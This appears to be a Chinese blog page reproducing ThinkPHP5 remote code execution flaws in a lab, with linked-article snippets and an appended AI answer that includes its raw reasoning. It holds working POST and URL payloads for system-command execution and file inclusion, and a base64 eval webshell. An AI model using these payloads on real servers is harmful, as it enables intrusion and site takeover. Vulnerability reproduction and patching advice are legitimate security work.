复现ThinkPHP5 5.0.23远程代码执行漏洞 Thinkphp5 5.0.22/5.1.29远程代码执行漏洞

最新推荐文章于 2024-08-15 00:33:53 发布
原创 最新推荐文章于 2024-08-15 00:33:53 发布 · 619 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php

本文详细介绍了ThinkPHP5版本5.0.23和5.0.22/5.1.29存在的远程代码执行漏洞。通过发送特定的POST请求,可以触发系统命令执行,例如写入Webshell文件。利用方法包括编码木马并解码,以及调用系统函数获取系统信息。

ThinkPHP5 5.0.23远程代码执行漏洞

在这里插入图片描述
http://159.75.16.25:8089/index.php?s=captcha会出现如下报错
在这里插入图片描述
F12进入开发者 用HackBar 插件发送 POST 请求
在这里插入图片描述
得到回显:
在这里插入图片描述
通过echo命令写入 Webshell 文件
首先将一句话木马进行 Base64 编码
在这里插入图片描述
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo -n YWE8P3BocCBAZXZhbCgkX1JFUVVFU1RbJ2FhYSddKSA/PmJi | base64 -d > shell.php
访问shell.Php

最低0.47元/天 解锁文章
记录笔记
关注
Thinkphp5 5.0.22/5.1.29 远程代码执行漏洞
Snowflake1997的博客
03-09 5736
漏洞描述 ThinkPHP是一款运用极广的PHP开发框架。其版本5中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。 影响范围 5.0 5.1 复现过程 这里使用5.0.20版本 使用vulhub cd /vulhub/thinkphp/5-rce 进入 docker-compose up -d 启动 访问 /index.php?s=/Index/\think\app/invokefunction&a..
复现ThinkPHP5 5.0.23远程代码执行漏洞
NLXHBM的博客
04-15 514
搜索ThinkPHP5.0.23相关漏洞 2. 发现了 5.0.23Remote Code Execution远程代码执行漏洞) 将该漏洞cp到tp.txt文件并查看 3.burpsuite进行抓包 4.执行命令 5. 写入phpinfo: `echo "<?php phpinfo(); ?>" > /var/www/public/phpinfo.php` 6.查看是否写入: 7.访问http://159.75.16.25:8...
ThinkPHP5远程代码执行高危漏洞(附:升级修复解决方法)
dabao87的博客
12-12 2万+
漏洞描述 由于ThinkPHP5框架对控制器名没有进行足够的安全检测,导致在没有开启强制路由的情况下,黑客构造特定的请求,可直接GetWebShell。 漏洞评级 严重 影响版本 ThinkPHP 5.0系列 &lt; 5.0.23 ThinkPHP 5.1系列 &lt; 5.1.31 安全版本 ThinkPHP 5.0系列 5.0.23 ThinkPHP 5.1系列 5.1.31 ...
ThinkPHP5 5.0.23 远程代码执行漏洞
Yk_GSDN的博客
08-15 619
使用burpsuite抓包软件抓包。2、访问靶机ip+端口号8080。将 GET传参改为POST传参。
复现Thinkphp5 5.0.22/5.1.29远程代码执行漏洞
weixin_67813445的博客
03-15 838
ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞
thinkphp5 5.0.22/5.1.29远程代码执行漏洞
weixin_45653478的博客
04-27 1456
ThinkPHP是中国使用极为广泛的PHP开发框架。在其版本 5 中,由于框架错误地处理了控制器名称,如果网站未启用强制路由(默认),它可以执行任何方法,从而导致 RCE 漏洞
ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞
城南以南花亦开
09-16 561
ThinkPHP 版本 5 中由于框架没有对控制器名进行正确检测处理从而导致的远程命令执行漏洞
Thinkphp5-5.0.22/5.1.29远程执行代码漏洞
hovcfuti的博客
10-13 620
ThinkPHP版本5中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。升级方法请参考:https://blog.thinkphp.cn/869075。vulhub拉取靶场。写入webshell。
Thinkphp5.0.23远程代码执行漏洞复现
02-01 2559
Thinkphp5.0.23远程代码执行漏洞介绍、成因和复现
【web攻防】ThinkPHP5.0.23 远程代码执行漏洞Thinkphp5.0.22/5.1.29远程代码执行漏洞Remote Code Execution)安鸾靶场练习
AAAAAAAAAAAA66的博客
12-30 2431
中华人民共和国网络安全法(出版物)_360百科中华人民共和国网络安全法,《中华人民共和国网络安全法》是为保障网络安全,维护网络空间主权和国家安全、社会公共利益,保护公民、法人和其他组织的合法权益,促进经济社会信息化健康发展而制定的法律。《中华人民共和国网络安全法》由中华人民共和国第十二届全国人民代表大会常务委员会第二十四次会议于2016年11月7日通过,自2017年6月1日起施行。https://baike.so.com/doc/24210940-24838928.html 目录 靶场地址 Thi
Thinkphp5 5.0.22/5.1.29远程代码执行漏洞复现
weixin_52347768的博客
03-28 4724
远程代码执行漏洞作用: 攻击者向后台服务器远程注入操作系统命令或者代码,进而控制后台系统 远程代码执行漏洞的原理: 由于部分应用系统从设计上需要给用户提供指定的远程命令操作的接口,如果没有做严格的安全控制,可能会导致攻击者通过该接口提交恶意的命令,从而让后台进行执行,从而控制整个后台服务器。 由于需求设计,后台有时候也会把用户的输入作为代码的一部分进行执行,也就造成了远程代码执行漏洞。 启动环境,访问http://159.75.16.25:8087,看到启动界面 进行复现,poc: /i
ThinkPHP5远程代码执行(CNVD-2018-24942)
ANOrange的博客
04-03 918
ThinkPHP5 存在远程代码执行漏洞。该漏洞由于框架对控制器名未能进行足够的检测,攻击者利用该漏洞对目标网站进行远程命令执行攻击。本文包含POC和ThinkPHP漏洞利用工具
ThinkPHP 5.1.x远程命令执行漏洞利用, 参考POC
weixin_35771144的博客
02-28 2101
  thinkphp5.1.1为例 1代码执行: http://192.168.0.108/public//index.php?s=index/\think\Request/input&filter=phpinfo&data=1 2、命令执行: http://192.168.0.108/public//index.php?s=index/\think...
ThinkPHP 5.0.x、5.1.x、5.2.x 全版本远程命令执行漏洞
热门推荐
SoulCat
01-27 3万+
ThinkPHP 5.0.x、5.1.x、5.2.x 全版本远程代码执行漏洞 漏洞概述: ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架。借鉴Struts框架的Action对象,同时也使用面向对象的开发结构和MVC模式。111日,ThinkPHP官方发布新版本5.0.24,在114日和15日发布两个更新,这几次更新都修复了远程代码执行漏洞,对于5.0.x、5.1.x、5....
Thinkphp5.0.0~5.0.23版本远程代码执行漏洞导致网站被挂马
m0_37360803的博客
03-11 1956
最近发现多个Thinkphp5开发的网站被挂马,导致首页被篡改,其他页面无法正常访问的情况。 木马中均包含以下代码: define(‘Viv, bebegim.’,‘Denzel-你的英雄’); 经过检查,这些攻击是利用了Thinkphp5.0.0~5.0.23版本远程进行代码调用的漏洞进行的getshell。 漏洞的详细原理参见:https://seaii-blog.com/index.php/...
thinkphp5漏洞
https://www.cnblogs.com/zpchcbd/
04-10 1445
文件包含: http://ip/index.php?s=captcha&m=1 post提交: _method=__construct&filter[]=think__include_file&get[]=/home/www/test3/public/1.txt&method=get&server[]= 代码执行漏洞: http://bugbank.51vi...
ThinkPHP框架漏洞
qian_227的博客
06-25 344
ThinkPHP5.0版本表单请求类型伪装中,通过$_POST['_method']来传递真实的请求方法,攻击者可以通过POST传递_method=__construct来对Request类的method方法进行覆盖。s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=命令参数。{ii}远程命令注入: 由于没有开启强制路由,未对路由的控制器进行过滤,导致远程命令执行。
ThinkPHP5 5.0.22/5.1.29 远程代码执行
最新发布
10-29
<think>嗯,用户要求我查找ThinkPHP5版本5.0.225.1.29远程代码执行漏洞信息。参考了多个站内引用,这些引用都指向同一个漏洞。 用户提供了五个引用来源,我需要从中提炼关键信息。引用[1]提到漏洞是由于获取method方法未正确处理方法名,导致攻击者能调用Request类任意方法;引用[2][3]则强调问题出在控制器名处理不当,默认配置下未开启强制路由;引用[4]明确了受影响版本范围是5.0.235.1.31之前的所有版本;引用[5]则给出了具体的漏洞复现URL示例。 漏洞本质在于框架对控制器名的过滤缺陷。当未开启强制路由时(默认关闭),攻击者可通过特殊构造的URL调用任意方法。比如引用[5]展示的payload就很典型:通过s参数注入命名空间路径,配合invokefunction调用危险函数如shell_exec。 修复方案很明确:升级到安全版本5.0.235.1.31。临时措施可开启强制路由,但可能影响正常业务。有趣的是,引用[1][3]都提到这是"RCE漏洞",说明危害等级很高。 用户可能需要明确三点:漏洞原理、如何验证漏洞存在、怎样修复。在整理回答时,我会把利用方式中的payload示例单独用代码块呈现,因为涉及具体攻击语法需要清晰分隔。另外需要强调docker复现环境搭建步骤,这对安全研究人员很实用。 考虑到用户是技术背景,相关问题设计可以更深入:比如漏洞的CVE编号、实际攻击案例、补丁对比分析等。安全类问题需要特别注意准确性,所有技术细节必须严格对照引用来源表述。 </think>根据提供的引用信息,以下是ThinkPHP 5.0.22/5.1.29 远程代码执行漏洞的完整分析: --- ### 💣 **漏洞详情** 1. **漏洞本质** 框架未正确处理控制器名和方法名,导致在未开启强制路由(默认关闭)时,攻击者可构造恶意URL调用`Request`类的任意方法,最终实现远程代码执行(RCE)[^1][^2][^3]。 2. **影响版本** - `5.0.x ≤ 5.0.22` - `5.1.x ≤ 5.1.29` (安全版本:5.0.23+ / 5.1.31+)[^4] 3. **触发条件** 默认配置下未开启强制路由(`url_route_must=false`),允许通过URL动态调用控制器方法[^2][^3]。 --- ### ⚠️ **利用方式** 1. **基础攻击Payload** 通过`s`参数注入恶意控制器路径,调用`invokefunction`执行系统命令: ```bash http://target.com/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=id ``` 此Payload调用`shell_exec('id')`返回当前用户信息[^5]。 2. **利用链关键点** - 路径穿越:`\think\app` 触发框架加载流程 - 动态调用:`invokefunction` 反射执行指定函数 - 参数控制:`vars[0]` 传递危险函数(如`system`/`exec`)[^5][^3] --- ### 🔧 **修复方案** 1. **官方补丁** 升级至安全版本: ```bash # 5.0.x 升级命令 composer update topthink/framework 5.0.23 # 5.1.x 升级命令 composer update topthink/framework 5.1.31 ``` 补丁修复了方法名过滤逻辑,禁止非法字符调用[^1][^4]。 2. **临时缓解措施** - 开启强制路由(修改`config/app.php`): ```php 'url_route_must' => true, // 强制路由生效 ``` - 配置WAF拦截包含`/think/app/invokefunction`的请求[^2][^3]。 --- ### 🔍 **漏洞复现步骤** 1. 使用Vulhub环境搭建: ```bash cd vulhub/thinkphp/5.rce docker-compose up -d # 启动漏洞环境 ``` 2. 访问Payload验证漏洞: ``` http://localhost:8080/index.php?s=/Index/\think\app/invokefunction&function=phpinfo&vars[]=1 ``` 成功则返回PHP配置信息[^4][^5]。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值